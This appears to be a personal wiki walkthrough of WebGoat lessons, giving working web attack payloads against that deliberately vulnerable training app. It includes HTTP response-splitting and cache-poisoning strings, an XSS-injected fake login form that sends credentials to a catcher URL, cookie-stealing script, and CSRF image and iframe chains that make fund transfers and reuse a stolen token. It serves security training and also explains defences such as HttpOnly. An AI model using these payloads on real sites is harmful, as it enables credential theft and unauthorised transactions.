Xiaopei's DokuWiki


WebGoat Walkthrough

Helper tools:

General

Http Basics

This lesson presents the basics for understanding the transfer of data between the browser and the web application.

solution

Type something and submit, then use WebScarab or Firebug/Tamper Data to view or intercept the HTTP request.

HTTP Splitting

Watch for this vulnerability wherever there is a redirect and the redirect location includes a user-supplied parameter.

The attacker passes malicious code to the web server together with normal input. A victim application will not be checking for CR (carriage return, also given by %0d or \r) and LF (line feed, also given by %0a or \n) characters. These characters not only give attackers control of the remaining headers and body of the response the application intends to send, but also allow them to create additional responses entirely under their control.

The effect of an HTTP Splitting attack is maximized when accompanied with a Cache Poisoning. The goal of Cache Poisoning attack is to poison the cache of the victim by fooling the cache to believe that the page hijacked using the HTTP splitting is a good one and it is indeed the server's copy.

The attack happens using the HTTP Splitting attack plus adding the Last-Modified: header and setting it to a future date. This will force the browser to send If-Modified-Since request header, which gives the attacker the chance to intercept the server's reply and replace it with a '304 Not Modified' reply.

solution

HTTP Splitting attacks
  1. Build the response to inject. The first Content-Length: 0 terminates the server's real response, so everything after the blank line is parsed as a second, attacker-controlled response (a blank line also separates the forged headers from the forged body)
    en
    Content-Length: 0
    
    HTTP/1.1 200 OK
    Content-Type: text/html
    Content-Length: 19
    
    <html>Hacked</html>
  2. URL-encode it. Use CR+LF (%0d%0a) for a new line on Windows and only LF (%0a) on Linux
    en%0AContent-Length%3A%200%0A%0AHTTP%2F1.1%20200%20OK%0AContent-Type%3A%20text%2Fhtml%0AContent-Length%3A%2019%0A%0A%3Chtml%3EHacked%3C%2Fhtml%3E
Elevate HTTP Splitting to Cache Poisoning
  1. Add a Last-Modified header with a date in the future to the response above
    en
    Content-Length: 0
    
    HTTP/1.1 200 OK
    Content-Type: text/html
    Last-Modified: Mon, 27 Oct 2090 08:00:00 GMT
    Content-Length: 19
    
    <html>Hacked</html>
  2. URL-encode
    en%0AContent-Length%3A+0%0A%0AHTTP/1.1+200+OK%0AContent-Type%3A+text/html%0ALast-Modified%3A+Mon%2C+27+Oct+2090+08%3A00%3A00+GMT%0AContent-Length%3A+19%0A%0A%3Chtml%3EHacked%3C/html%3E
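The two solutions above, as an added Node.js example (this is not code from the page or from WebGoat): buildSplitPayload produces the URL-encoded parameter value, vulnerableRedirect stands in for the lesson's redirect that copies the parameter into a Location header without stripping CR/LF, and parseResponses shows how a client that splits the stream on Content-Length sees two responses, the second carrying the future Last-Modified that the cache-poisoning variant relies on. The redirect URL, the parameter name "language" and the Content-Length-only parser are assumptions.

```javascript
// Added example, not WebGoat's code: build an HTTP splitting payload and show
// how a Content-Length-driven client turns the server's single redirect into
// two responses. The parameter name "language" and the redirect URL are assumptions.
const CRLF = "\r\n";

// The forged second response. Last-Modified in the future is what elevates the
// split to cache poisoning: a cache keeps the page and answers 304 on revalidation.
const injectedBody = "<html>Hacked</html>";
const injectedResponse = [
  "HTTP/1.1 200 OK",
  "Content-Type: text/html",
  "Last-Modified: Mon, 27 Oct 2090 08:00:00 GMT",
  "Content-Length: " + Buffer.byteLength(injectedBody),
  "",
  injectedBody,
].join(CRLF);

// Parameter value: legitimate value, newline, "Content-Length: 0" to terminate the
// server's real response, blank line, then the forged response. Pass "\n" as
// newline for the LF-only variant the lesson uses on Linux.
function buildSplitPayload(value, forged, newline = CRLF) {
  const raw = value + newline + "Content-Length: 0" + newline + newline + forged;
  return encodeURIComponent(raw);
}

// Stand-in for the vulnerable server: it decodes the parameter and copies it into
// the Location header without stripping CR or LF.
function vulnerableRedirect(encodedParam) {
  const decoded = decodeURIComponent(encodedParam);
  return "HTTP/1.1 302 Found" + CRLF +
    "Location: http://localhost:8080/webgoat/attack?language=" + decoded + CRLF + CRLF;
}

// Minimal client-side splitter: status line + headers up to a blank line, then
// exactly Content-Length bytes of body, repeated until the stream is consumed.
function parseResponses(stream) {
  const responses = [];
  let pos = 0;
  while (pos < stream.length) {
    const headerEnd = stream.indexOf(CRLF + CRLF, pos);
    if (headerEnd === -1) break;
    const headerBlock = stream.slice(pos, headerEnd);
    if (headerBlock.trim() === "") { pos = headerEnd + 4; continue; }
    const lines = headerBlock.split(CRLF);
    const headers = {};
    for (const line of lines.slice(1)) {
      const idx = line.indexOf(":");
      if (idx > 0) headers[line.slice(0, idx).trim().toLowerCase()] = line.slice(idx + 1).trim();
    }
    const len = parseInt(headers["content-length"] || "0", 10);
    const bodyStart = headerEnd + 4;
    responses.push({ statusLine: lines[0], headers, body: stream.slice(bodyStart, bodyStart + len) });
    pos = bodyStart + len;
  }
  return responses;
}

// Walk the whole chain once: payload -> vulnerable redirect -> client parsing.
function demo() {
  const payload = buildSplitPayload("en", injectedResponse);
  return parseResponses(vulnerableRedirect(payload));
}

for (const r of demo()) console.log(r.statusLine, r.headers, JSON.stringify(r.body));
```

A benign value such as "en" yields a single 302; the split value yields the 302 with an empty body followed by the forged 200, which is exactly what a shared cache in front of the server would store under the request URL.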

Cross-Site Scripting (XSS)

Phishing

If the target site has an XSS flaw, you can inject a login form to phish. Key points:

  1. The injected form has to look plausible
  2. To submit the captured values, have the form's submit handler load an image whose URL carries them to the attacker's endpoint:
    var XSSImage=new Image;
    XSSImage.src="http://localhost:8080/webgoat/catcher?PROPERTY=yes&user=" + this.form.username.value +
                 "&password=" + this.form.password.value;

solution

<br>
<br>
<hr>
<form>
  <H3>This feature requires account login:</H3>
  <br>
  <br>
  Enter Username:<br>
  <input type="text" id="user" name="user"><br>
  Enter Password:<br>
  <input type="password" id="pass" name="pass"><br>
  <input type="submit" name="login" value="login" 
         onclick="var XSSImage=new Image; 
                  XSSImage.src='http://127.0.0.1:8080/webgoat/catcher?PROPERTY=yes&u=' + 
                               document.getElementById('user').value + '&p=' + document.getElementById('pass').value;">
</form>
<br>
<br>
<hr>
<script>alert(document.cookie)</script>

https://www.owasp.org/index.php/HTTPOnly

HttpOnly is an additional flag included in a Set-Cookie HTTP response header. Using the HttpOnly flag when generating a cookie helps mitigate the risk of client side script accessing the protected cookie (if the browser supports it). As a result, even if a cross-site scripting (XSS) flaw exists, and a user accidentally accesses a link that exploits this flaw, the browser (primarily Internet Explorer) will not reveal the cookie to a third party.

A way around HttpOnly: TRACE (Cross-Site Tracing, XST). Note that current browsers refuse to send TRACE from XMLHttpRequest or fetch, so this is mostly of historical interest; the server-side fix is still to disable TRACE.

An XST (Cross-Site Tracing) attack involves the use of XSS and the HTTP TRACE function. HTTP TRACE is a default function in many webservers, primarily used for debugging. The client sends an HTTP TRACE with all header information including cookies, and the server simply responds with that same data. If using Javascript or other methods to steal a cookie or other information is disabled through the use of an “httpOnly” cookie or otherwise, an attacker may force the browser to send an HTTP TRACE request and send the server response to another site. “httpOnly” is an extra parameter added to cookies which hides the cookie from the script (supported in most, but not all browsers). For example “javascript:alert(document.cookie)” would not show an httpOnly cookie.

This type of attack can occur when there is an XSS vulnerability and the server supports HTTP TRACE.
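An added check (not from the page or from OWASP) for the two preconditions XST needs: session cookies set without HttpOnly, and TRACE advertised in the Allow header of an OPTIONS response. The headers it inspects are constructed inline and the cookie name JSESSIONID is an assumption; in practice you would feed it the headers captured with WebScarab or Tamper Data.

```javascript
// Added check, not from the page or OWASP: flag the two things XST relies on,
// session cookies without HttpOnly and TRACE advertised as allowed. The sample
// headers below are constructed to look like a WebGoat response; the cookie
// name JSESSIONID is an assumption.

// Parse one Set-Cookie header into its name plus the attributes that matter here.
function parseSetCookie(header) {
  const [pair, ...attrs] = header.split(";").map((s) => s.trim());
  const eq = pair.indexOf("=");
  const attrMap = {};
  for (const a of attrs) {
    const i = a.indexOf("=");
    const key = (i === -1 ? a : a.slice(0, i)).toLowerCase();
    attrMap[key] = i === -1 ? true : a.slice(i + 1);
  }
  return {
    name: eq === -1 ? pair : pair.slice(0, eq),
    httpOnly: "httponly" in attrMap,
    secure: "secure" in attrMap,
    sameSite: typeof attrMap.samesite === "string" ? attrMap.samesite : null,
  };
}

// Allow header from an OPTIONS response, e.g. "GET, HEAD, POST, TRACE".
function traceAllowed(allowHeader) {
  return allowHeader.split(",").map((m) => m.trim().toUpperCase()).includes("TRACE");
}

// headers: { setCookie: [...], allow: "..." }; sessionCookieNames: the cookies worth stealing.
function auditResponse(headers, sessionCookieNames) {
  const findings = [];
  for (const raw of headers.setCookie || []) {
    const c = parseSetCookie(raw);
    if (!sessionCookieNames.includes(c.name)) continue;
    if (!c.httpOnly) findings.push(c.name + ": no HttpOnly, document.cookie exposes it under XSS");
    if (!c.secure) findings.push(c.name + ": no Secure, sent over plain HTTP");
    if (!c.sameSite) findings.push(c.name + ": no SameSite, attached to cross-site requests (CSRF)");
  }
  if (headers.allow && traceAllowed(headers.allow)) {
    findings.push("TRACE allowed: XST can echo request headers, including cookies, back to a script");
  }
  return findings;
}

// Constructed samples: a weak WebGoat-style response and a hardened one.
const weakHeaders = {
  setCookie: ["JSESSIONID=ABC123; Path=/webgoat", "theme=dark; Path=/"],
  allow: "GET, HEAD, POST, OPTIONS, TRACE",
};
const hardenedHeaders = {
  setCookie: ["JSESSIONID=ABC123; Path=/webgoat; HttpOnly; Secure; SameSite=Lax"],
  allow: "GET, HEAD, POST, OPTIONS",
};

console.log(auditResponse(weakHeaders, ["JSESSIONID"]));
console.log(auditResponse(hardenedHeaders, ["JSESSIONID"]));
```

Only the named session cookies are reported, so a missing flag on a harmless preference cookie does not drown out the finding that matters.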

Cross Site Request Forgery (CSRF)

The goal of CSRF is to make the user perform an action without knowing it. Simply loading an image is enough to trigger the action (which is why Gmail does not load images by default):

<img src="http://localhost:8080/webgoat/attack?Screen=81&menu=210&transferFunds=5000" 
     width="1" height="1" />

CSRF Prompt By-Pass

If the action takes a combo (one request followed by another), chain the second request from the first <img>'s onerror handler. The transfer URL returns HTML rather than an image, so onerror fires once that first request has completed:

<img src="http://localhost:8080/webgoat/attack?Screen=81&menu=210&transferFunds=5000"
     onerror="document.getElementById('image2')
                      .src='http://localhost:8080/webgoat/attack?Screen=81&menu=210&transferFunds=CONFIRM'"
     width="1" height="1" />
<img id="image2" width="1" height="1" />

CSRF Token By-Pass

If the combo is more involved (a later request needs information from an earlier response, here the CSRFToken), use <iframe>. Reading frame1's contentDocument only works because the attack HTML is stored on WebGoat's own origin; for a frame from another origin the same-origin policy blocks it.

<script>
var tokenvalue;

// Step 1: once the first iframe has loaded the transfer page, read the CSRF
// token out of its second form (same origin, so contentDocument is readable).
function readFrame1()
{
    var frameDoc = document.getElementById("frame1").contentDocument;
    var form = frameDoc.getElementsByTagName("form")[1];
    var token = form.CSRFToken.value;
    tokenvalue = '&CSRFToken=' + token;

    loadFrame2();
}

// Step 2: point the second iframe at the transfer URL with the stolen token appended.
function loadFrame2()
{
    var testFrame = document.getElementById("frame2");
    var sssrc = "http://localhost:8080/webgoat/attack?Screen=78&menu=900&transferFunds=4000" + tokenvalue;
    testFrame.src = sssrc;
}
</script>
<iframe src="http://localhost:8080/webgoat/attack?Screen=78&menu=900&transferFunds=main"
        onload="readFrame1();"
        id="frame1" frameborder="1" marginwidth="0"
        marginheight="0" width="800" scrolling="yes" height="300"></iframe>
<iframe id="frame2" frameborder="1" marginwidth="0"
        marginheight="0" width="800" scrolling="yes" height="300"></iframe>


Access Control Flaws

Using an Access Control Matrix

Enumerate the roles/permissions of each user to pick the attack target.

Bypass a Path Based Access Control Scheme

Access a file that is not in the listed directory (path traversal with ../ in the file name).

Bypass Business Layer Access Control

Some functions may only be hidden in the UI according to the user's permissions, while the business layer does no permission check of its own.

Breaking Data Layer Access Control

Data accessed by ID may not be restricted as to which user may access which records.

Remote Admin Access

Try to reach the site's administration interface, at the application level (such as WordPress's wp-admin) or at the server level (such as Tomcat's admin application).

it/secure/owasp/webgoat_hack.txt · Last modified: 2013/08/19 07:22 (external edit)